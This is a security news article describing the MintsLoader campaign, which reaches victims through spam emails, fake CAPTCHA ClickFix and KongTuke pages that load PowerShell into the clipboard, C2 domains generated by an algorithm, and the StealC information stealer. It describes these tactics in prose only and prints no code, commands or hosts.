MintsLoader Malware
Cybersecurity researchers have uncovered an active campaign leveraging a malware loader known as MintsLoader. This PowerShell-based threat has been utilized to distribute secondary payloads, including the StealC information stealer and a legitimate open-source platform called BOINC. Delivered via spam emails, MintsLoader uses links to KongTuke or ClickFix pages or malicious JScript files to gain access to victims' systems. The campaign, detected in early January 2025, has primarily targeted critical sectors such as electricity, oil and gas, and legal services in the United States and Europe.
Table of Contents
Fake CAPTCHA Prompts: A Deceptive Entry Point
The campaign exploits a growing trend in harmful tactics, such as abusing fake CAPTCHA verification prompts. These deceptive pages trick users into executing compromised PowerShell scripts by posing as routine human verification checks. Known as KongTuke and ClickFix techniques, these attacks manipulate unsuspecting users by injecting malicious scripts into their copy/paste buffers. Victims are then instructed to paste and execute the script in the Windows Run window, completing the attackers' first stage of infiltration.
How KongTuke Injects Fraudulent Scripts
KongTuke relies on a script injection mechanism that causes targeted websites to display counterfeit 'verify you are human' pages. When a victim interacts with these pages, a malevolent PowerShell script is silently loaded into their clipboard. The page provides explicit instructions on how to paste and execute the script, making the attack both simple and effective. A related campaign distributing BOINC demonstrates how widespread this deceptive technique has become.
MintsLoader’s Sophisticated Infection Chain
MintsLoader's attack chain begins with a fraudulent link delivered through spam emails. When clicked, the link downloads an obfuscated JavaScript file. This file triggers a PowerShell command to download MintsLoader using curl, execute it, and erase itself from the system to avoid detection. In alternative attack paths, users are redirected to ClickFix-style pages, where they are again prompted to execute scripts in the Windows Run prompt.
Once deployed, MintsLoader contacts a Command-and-Control (C2) server to download further payloads. These interim PowerShell scripts perform system checks to evade sandboxes and other analysis tools. The loader also incorporates a Domain Generation Algorithm (DGA), which dynamically creates C2 domain names by adding the current day of the month to a seed value.
StealC: A Powerful Payload with Regional Exclusions
The attack campaign culminates in the deployment of StealC, an information stealer that has been marketed as part of the Malware-as-a-Service (MaaS) ecosystem since early 2023. Likely a re-engineered variant of the Arkei Stealer, StealC boasts advanced evasion techniques. One notable feature is its regional targeting capabilities—it avoids infecting systems located in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan, suggesting specific motives or constraints guiding its development.
Rising Threats and User Vigilance
The discovery of MintsLoader and its associated campaigns underscores the evolving sophistication of cyberattacks targeting critical industries. By exploiting trust through fake CAPTCHA prompts and leveraging intricate delivery mechanisms, attackers continue to innovate their methods. As threats like these grow more advanced, user vigilance remains a vital defense against falling victim to these deceptive schemes.
